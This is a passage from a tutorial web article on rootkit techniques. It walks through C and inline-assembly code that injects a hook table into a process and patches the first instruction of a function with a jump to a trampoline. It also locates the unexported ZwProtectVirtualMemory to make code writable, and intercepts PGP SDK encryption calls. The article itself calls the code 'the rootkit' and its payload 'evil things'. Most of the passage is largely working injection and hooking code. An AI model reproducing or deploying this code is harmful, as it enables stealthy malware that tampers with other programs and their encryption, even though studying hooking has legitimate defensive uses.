// dynamic link library (old=PGP_SDK.DLL, new=PGPsdk.dll)

// This function accepts the callers input and output,

// which may be memory or file based, and converts the input

// into encrypted output

//

// return TRUE to allow encryption

// return FALSE to block encryption

///////////////////////////////////////////////////////////////

DWORD beforeEncode( PDWORD stack, DWORD* callbackReturn, IN_PROCESS_DATA* pCallData )

{

                void*                                                                     contextPtr = (void*)stack[1]; // stack[0] is return address so the stack[1] is first parameter

                PGPOptionList*                                                optionListPtr = (PGPOptionList*)stack[2]; // second parameter of original Encode function

                DWORD                                                                                dwRet = (DWORD)TRUE;

 

                int index;

                int inputType = 0;

                void* lpBuffer;

                DWORD dwInBufferLen = 0;

                PGPOption* currentOption = optionListPtr->options;

                PFLFileSpec* fileSpec;

 

                // Look at the options in the option list

                for( index = 0; index < optionListPtr->numOptions; index++)

                {

                                if( currentOption->type == 1 )

                                {

                                                // File Input

                                                inputType = 1;

                                                fileSpec = (PFLFileSpec*)currentOption->value;

                                                lpBuffer = fileSpec->data;

                                                dwInBufferLen = (DWORD)pCallData->plstrlenA((LPCSTR)(lpBuffer)); //pCallData is just a structure passed by detour and the structure is defined in data section by process-inject

                                                break;

                                }

                                else if( currentOption->type == 2 )

                                {

                                                // Buffer Input

                                                inputType = 2;

                                                lpBuffer = (void*)currentOption->value;

                                                dwInBufferLen = (DWORD)currentOption->valueSize;

                                                break;

                                }

                                currentOption++;

                }

 

                // Process buffer or file before encryption -- for now do nothing --

                if(( inputType == 1 || inputType == 2 ) && ( dwInBufferLen > 0 ))

                {                                             

                                // just blocking this API to show functionality

                                dwRet = (DWORD)FALSE;

                                *callbackReturn = PGP_BAD_API;

                }

                return dwRet;

}

 

After OriginalFunction does nothing except showing the functionality that you can place codes after the hooked function:

void AfterOriginalFunction( DWORD hookIndex, PDWORD originalStack, DWORD* returnParameter, IN_PROCESS_DATA* callData )

{

}

 

Ok now that you have understood what happens after hooking, it is time to see how we place the hook. We need to:

  • Copy our custom code (HookTable, References to the kernel library functions, DetourFunction and etc.) to the Process’s memory
  • Injecting the opcode + ‘begining of our injected code in PROCESS’s memory’ by modifying the first instruction of the hooked function
  • Copy that first instruction in the HookTable and place a jump after it back to the second instruction of original hooked function
  • Copy the parameters, passed from hooked zwMapViewOfSection, to the HookTable

Copying the first instruction may seem simple but in fact it is not! To understand the issue you should be familiar with X86 instruction set. Opcodes are not same length and depending on the opcode you should copy following bytes (for example source and destination address for the Mov instruction). I skip the details of transferInstruction function which does the low-level works but if you’re interested you can download the source codes from the mentioned address and see file Parse86.h. For now just the high level function get86Instruction:

ULONG getx86Instruction( PCHAR originalCode, PCHAR instructionBuffer, ULONG bufferLength ) //This function is supposed to return one instruction

{

                PBYTE source = NULL;

                PBYTE destination = NULL;

                ULONG ulCopied = 0;

                PBYTE jumpAddress = NULL;

                LONG  extra = 0;

 

                memset( instructionBuffer, 0, bufferLength );

                source = (PBYTE)originalCode;

                destination = (PBYTE)instructionBuffer;

                jumpAddress = NULL;

                extra = 0;

                // start with 5 bytes

                for( ulCopied = 0; ulCopied < 5; ) //5 because a jmp can be 5 bytes, it may copy 2 instruction

                {

                                source = transferInstruction( destination, source, &jumpAddress, &extra ); //this funcion checks the type of operation opcode and copy one whole instruction in destination and returns source + num of bytes copied. it also sets jump address in case of jump but it will not be used so we can say jumpAddress, extra are useless

                                if( !source )

                                {

                                                memset( instructionBuffer, 0, bufferLength );

                                                ulCopied = 0;

                                                break;

                                }

                                ulCopied = (DWORD)source - (DWORD)originalCode; //This line insures that never more than two instructions are copied

                                if( ulCopied >= bufferLength )

                                {

                                                ASSERT( FALSE );

                                                break;

                                }

                                destination = (PBYTE)instructionBuffer + ulCopied;

                }

                return ulCopied;

}

 

Changing the first instruction of the original function is not easy also, because the memory containing that instruction is write-protected and we should use the ZwProtectVirtualMemory kernel undocumented function which make a portion of memory writable. Using a documented function ZwPulseEvent we look for ZwProtectVirtualMemory and then use it to make the original function writable:

ZwProtectVirtualMemory(

  IN HANDLE               ProcessHandle,

  IN OUT PVOID            *BaseAddress,

  IN OUT PULONG           NumberOfBytesToProtect,

  IN ULONG                NewAccessProtection,

  OUT PULONG              OldAccessProtection );

ZWPROTECTVIRTUALMEMORY OldZwProtectVirtualMemory;

…

OldZwProtectVirtualMemory = findUnresolved(ZwPulseEvent);

…

PVOID findUnresolved( PVOID pFunc )

{

                UCHAR pattern[5] = { 0 };

                PUCHAR               bytePtr = NULL;

                PULONG  oldStart = 0;

                ULONG newStart = 0;

 

                memcpy( pattern, pFunc, 5 ); // copy first 5 bytes of function ZwPulseEvent

 

                // subtract offset

                oldStart = (PULONG)&(pattern[1]);

                newStart = *oldStart - 1; // change value of second byte by decresing it to one (probably this 5 byte of ZwProtectVirtualMemory is similar to ZwPulseEvent except the second byte)

                *oldStart = newStart;

 

                // Search for pattern

                for( bytePtr = (PUCHAR)pFunc - 5; bytePtr >= (PUCHAR)pFunc - 0x800; bytePtr-- ) //search backward from ZwPulseEvent to 2KB=0x800 before it

                                if( checkPattern( bytePtr, pattern, 5 ) == 0 ) // it simply checks the pattern from bytePtr to next 5 bytes, and since it slowly goes down it checks all possible 5 bytes from ZwPulseEvent to 2KB=0x800 before it

                                                return (PVOID)bytePtr;

                // pattern not found

                return NULL;

}

BOOL makeWritable( PVOID address, ULONG size )

{

    NTSTATUS       status;

                ULONG                 pageAccess;

                ULONG                 ZwProtectArray[3] = { 0 };

 

                pageAccess = PAGE_EXECUTE_READWRITE;

                ZwProtectArray[0] = (ULONG)address; // address of function to make it writable, this is important because we need to temper the hooked function and also hooktable

                ZwProtectArray[1] = size;

                ZwProtectArray[2] = 0;

 

                status = OldZwProtectVirtualMemory( (HANDLE)-1, //although this function is not exported, we found its address in memory and defined its prototype so now we can use it

                                                                                                                                                                (PVOID *)(&(ZwProtectArray[0])),

                                                                                                                                                                &(ZwProtectArray[1]), // this parameter is in

                                                                                                                                                                pageAccess, //PAGE_EXECUTE_READWRITE

                                                                                                                                                                &(ZwProtectArray[2]) ); // this parameter is out

 

                if( !NT_SUCCESS( status ) )

                                return FALSE;

 

                return TRUE;

}

 

Now that we have all the tools we need, see the processInject code:

BOOL processInject( CALL_DATA_STRUCT* pCallData, int hooks, PCHAR pMemory )

{

                int           loop;

                int           offsetToPattern;

                PCHAR pNewTable;

                PCHAR pNewCode;

                IN_PROCESS_DATA* pNewData;

                PCHAR pOldTable;

                PCHAR pOldCode;

                PCHAR pOldData;

                DWORD tableLength;

                DWORD tableOffset;

                PCHAR callDataOffset;

 

                if( !kernel32Base )

                                return FALSE;

 

                if( !getHookPointers( pMemory, &pNewTable, &pNewCode, (PCHAR*)&pNewData ) )

                                return FALSE;

// To call library functions we need, we should map their addresses because these are not supposed to be present in the caller process. We use GetFunctionAddress(Remember that we now setup hooking so we have access to this and other defined functions) to locate library functions and put them in the IN_PROCESS_DATA structure

                pNewData->pOutputDebugStringA = (PROTOTYPE_OutputDebugStringA)GetFunctionAddress( kernel32Base, "OutputDebugStringA", NULL, 0 );

                pNewData->pOutputDebugStringW = (PROTOTYPE_OutputDebugStringW)GetFunctionAddress( kernel32Base, "OutputDebugStringW", NULL, 0 );

                pNewData->pCloseHandle = (PROTOTYPE_CloseHandle)GetFunctionAddress( kernel32Base, "CloseHandle", NULL, 0 );

                pNewData->pSleep = (PROTOTYPE_Sleep)GetFunctionAddress( kernel32Base, "Sleep", NULL, 0 );

                pNewData->pCreateFileW = (PROTOTYPE_CreateFileW)GetFunctionAddress( kernel32Base, "CreateFileW", NULL, 0 );

                pNewData->plstrlenA = (PROTOTYPE_lstrlenA)GetFunctionAddress( kernel32Base, "lstrlenA", NULL, 0 );

                pNewData->plstrlenW = (PROTOTYPE_lstrlenW)GetFunctionAddress( kernel32Base, "lstrlenW", NULL, 0 );

                pNewData->plstrcpynA = (PROTOTYPE_lstrcpynA)GetFunctionAddress( kernel32Base, "lstrcpynA", NULL, 0 );

                pNewData->plstrcpynW = (PROTOTYPE_lstrcpynW)GetFunctionAddress( kernel32Base, "lstrcpynW", NULL, 0 );

                pNewData->plstrcpyA = (PROTOTYPE_lstrcpyA)GetFunctionAddress( kernel32Base, "lstrcpyA", NULL, 0 );

                pNewData->plstrcpyW = (PROTOTYPE_lstrcpyW)GetFunctionAddress( kernel32Base, "lstrcpyW", NULL, 0 );

                pNewData->plstrcmpiA = (PROTOTYPE_lstrcmpiA)GetFunctionAddress( kernel32Base, "lstrcmpiA", NULL, 0 );

                pNewData->plstrcmpiW = (PROTOTYPE_lstrcmpiW)GetFunctionAddress( kernel32Base, "lstrcmpiW", NULL, 0 );

                pNewData->plstrcmpA = (PROTOTYPE_lstrcmpA)GetFunctionAddress( kernel32Base, "lstrcmpA", NULL, 0 );

                pNewData->plstrcmpW = (PROTOTYPE_lstrcmpW)GetFunctionAddress( kernel32Base, "lstrcmpW", NULL, 0 );

                pNewData->plstrcatA = (PROTOTYPE_lstrcatA)GetFunctionAddress( kernel32Base, "lstrcatA", NULL, 0 );

                pNewData->plstrcatW = (PROTOTYPE_lstrcatW)GetFunctionAddress( kernel32Base, "lstrcatW", NULL, 0 );

                sprintf( pNewData->debugString, "This is a string contained in injected memory\n" );

 

                __asm

                {

                                lea eax, HookTable

                                mov pOldTable, eax

                                lea eax, DetourFunction

                                mov pOldCode, eax

                                lea eax, EndOfInjectedCode

                                mov pOldData, eax

                }

 

                memcpy( pNewCode, pOldCode, pOldData - pOldCode ); //write detuor function in the code section of memory allocated in the process space

                tableLength = pOldCode - pOldTable;

                for( loop = 0; loop < (int)tableLength - 4; loop ++ )

                {

                                if( *(PDWORD)(pOldTable+loop) == (DWORD)START_OF_TRAMPOLINE_PATTERN ) // search to find -1. in fact -1 is the first byte after phoney_jump in HookTable

                                {

                                                offsetToPattern = loop; // offset to phoney_jump

                                                break;

                                }

                }

                for( loop = 0; loop < hooks; loop ++ ) // for now it is just one hook, but as you can see this function can place several hooks for different functions

                {

                                tableOffset = tableLength * pCallData[loop].index; // according to potential of several hooks, it calculates table of current hook. for now it is just one table and actually is 0

                                callDataOffset =  pNewTable + tableOffset + offsetToPattern; //address of phoney_jump

                                memcpy( pNewTable + tableOffset, pOldTable, tableLength ); // write HookTable in table section of memory allocated in the process space

                                *((PDWORD)(callDataOffset + CALLDATA_INDEX_LOCATION)) = pCallData[loop].index; //in first 4 byte(on -1) it writes the index of hook for example USERHOOK_beforeEncode

                                *((PDWORD)(callDataOffset + CALLDATA_PARAMETERS_LOCATION)) = pCallData[loop].parameters;// in second 4 byte (actually 4 byte after phoney_jump) it writes number of parameters of original function

                                *((PDWORD)(callDataOffset + CALLDATA_CALLTYPE_LOCATION)) = pCallData[loop].callType; // in byte 8 to 12 it writes calltype like CDECL_TYPE

                                *((PDWORD)(callDataOffset + CALLDATA_STACK_OFFSET_LOCATION)) = pCallData[loop].stackOffset; // byte 12 to 16

                                INJECT_JUMP( callDataOffset + JUMP_TO_DETOUR_LOCATION, pNewCode ); // it modifies the jmp DetourFunction instruction before the -1 in HookTable so it points to the CALLER PROCESS's detour function (which is just copied)! note: the jmp instruction is 5 byte!

                                createTrampoline( pCallData[loop].hookFunction, // address of hooked function

                                                pNewTable + tableOffset, //Beginning of HookTable

                                                callDataOffset + TRAMPOLINE_LOCATION); // actually in first no-op of HookTable

                }

                return TRUE;

}

// Parse first instruction of original function.

// Replace first instruction with jump to hook.

// Save first instruction to trampoline function.

// Only call original function through trampoline.

BOOL isJump( PCHAR instruction, ULONG instructionLength )

{

                BYTE firstByte;

                BYTE secondByte;

                PCHAR thisInstruction;

                ULONG thisInstructionLength;

                ULONG nextInstructionLength;

                char instructionBuffer[MAX_INSTRUCTION] = { 0 };

 

                thisInstruction = instruction;

                thisInstructionLength = instructionLength;

                while( thisInstructionLength > 0 ) // because of the 5 bytes limits in get86Instruction it may have more than one instruction

                {

                                // check all jump op codes

                                firstByte = thisInstruction[0];

                                secondByte = thisInstruction[1];

                                if( IS_BETWEEN( firstByte, 0x70, 0x7f ) ) //this and following next lines checks all types of jump

                                                return TRUE;

                                else if( IS_BETWEEN( firstByte, 0xca, 0xcb ) )

                                                return TRUE;

                                else if( IS_BETWEEN( firstByte, 0xe0, 0xe3 ) )

                                                return TRUE;

                                else if( IS_BETWEEN( firstByte, 0xe8, 0xeb ) )

                                                return TRUE;

                                else if( IS_EQUAL( firstByte, 0xcf ) )

                                                return TRUE;

                                else if( IS_EQUAL( firstByte, 0xf3 ) )

                                                return TRUE;

                                else if( IS_EQUAL( firstByte, 0xff ) )

                                {

                                                if( secondByte == 0x15 || secondByte == 0x25 )

                                                                return TRUE;

                                                if( (secondByte & 0x38) == 0x10 || (secondByte & 0x38) == 0x18 ||

                                                                (secondByte & 0x38) == 0x20 || (secondByte & 0x38) == 0x28 )

                                                                return TRUE;

                                }

                                else if( IS_EQUAL( firstByte, 0x0f ) )

                                {

                                                if( IS_BETWEEN( secondByte, 0x80, 0x8f ) )

                                                                return TRUE;

                                }

                                memset( instructionBuffer, 0, sizeof(instructionBuffer) );

                                nextInstructionLength = getNextInstruction( thisInstruction, 1, instructionBuffer, MAX_INSTRUCTION );

                                if( nextInstructionLength <= 0 )

                                                break;

                                thisInstructionLength -= nextInstructionLength;

                                thisInstruction += nextInstructionLength;

                }

                return FALSE;

}

#define INJECT_JUMP( from, to ) { ((PCHAR)from)[0] = (CHAR)0xe9; *((DWORD *)&(((PCHAR)(from))[1])) = (PCHAR)(to) - (PCHAR)(from) - 5; } // - 5 is because of size of jump instruction(see it as to -(from + 5)) since for jmp we must calculate bytes after the instuction itself

BOOL createTrampoline( PCHAR originalAddress, PCHAR tableAddress, PCHAR trampolineAddress )

{

                ULONG                 newOriginalAddress = 0;

                char                       instruction[MAX_INSTRUCTION] = { 0 }; //MAX_INSTRUCTION is 36

                ULONG                 instructionLength;

 

                instructionLength = getx86Instruction( originalAddress, instruction, sizeof(instruction) );

                newOriginalAddress = (ULONG)(originalAddress + instructionLength);

                // see if it's a jump

                if( isJump( instruction, instructionLength ) ) //here all types of jump will be examined

                {

                                PVOID pOldDstAddr = (PVOID)(GET_JUMP( instruction )); // but here just 0xe9 jump is acceptable and in case of other jumps 0 is returned and createTrampoline function returns false since cases like call can not be handled in our detour function

                                if( pOldDstAddr )

                                {

                                                // If first instruction of original function

                                                // is a jump, trampoline instruction is NO-OP

                                                // and jump target is original jump target

                                                memset( instruction, 0x90, sizeof(instruction) );

                                                instructionLength = 0;

                                                newOriginalAddress = (ULONG)pOldDstAddr; //Keeping track of jump address for return(after executing first instruction and do our evil things)

                                }

                                else

                                {

                                                return FALSE;

                                }

                } // up to here we have done 2 jobs. first we have found the instruction ( instruction variable ) to be placed in HookTable phoney_call place ( either the first instruction of original function or the no-op instruction ) and second we found the address (newOriginalAddress variable) to return after our beforeEncode function ( either address after the first instruction or in case of jump the address of jump)

                if( makeWritable( (PVOID)trampolineAddress, MAX_INSTRUCTION + 5 ) ) // this function make writing accessibe with an un-exported function

                {

                                // write trampoline function

                                memset( trampolineAddress, 0x90, MAX_INSTRUCTION + 5 ); // +5 is because the jmp EndOfInjectedCode, this jump is useles since we go to the EndOfInjectedCode by pushing the address on top of the stack. so it can be replaced by no-op

                                memcpy( trampolineAddress, instruction, instructionLength ); // set the first instruction of original function in the HookTable

                                INJECT_JUMP( trampolineAddress + instructionLength, newOriginalAddress ); //set the jmp to the original function in the HookTable

                                // set original function to jump to trampoline function

                                if( makeWritable( originalAddress, instructionLength + 5 ) ) //to be cautious we make 5 bytes more writable

                                {

                                                INJECT_JUMP( originalAddress, tableAddress ); //here we inject jmp to our HookTable address in original function

                                                return TRUE;

                                }

                }

                return FALSE;

}

After retrieving addresses of codes in calling process by getHookPointers in line 35 we start writing references to the required kernel library functions in line 40 to 73 (remember we can't just call these functions because we don't know if there are references to these functions in the calling process). In line 83 to 93 we get the addresses of injected codes to be copied in OUR code (the rootkit) to copy them in their destinations in the calling process. In line 103 to 143 we write the parameters from the hooked kernel(parameters to adjust the stack from hooked ZwMapViewOfSection), original function's first instruction and the jump back to the second instruction in the HookTable considering the fact that there may be multiple functions to be hooked.

Read 1822 times Last modified on Saturday, 30 May 2015 18:25
Rate this item
0
(0 votes)
More in this category: Kernel hooks | Kernel Hacking »
About Author
Leave a comment

Make sure you enter the (*) required information where indicated. HTML code is not allowed.

Advanced Programming Concepts
News Letter

Subscribe our Email News Letter to get Instant Update at anytime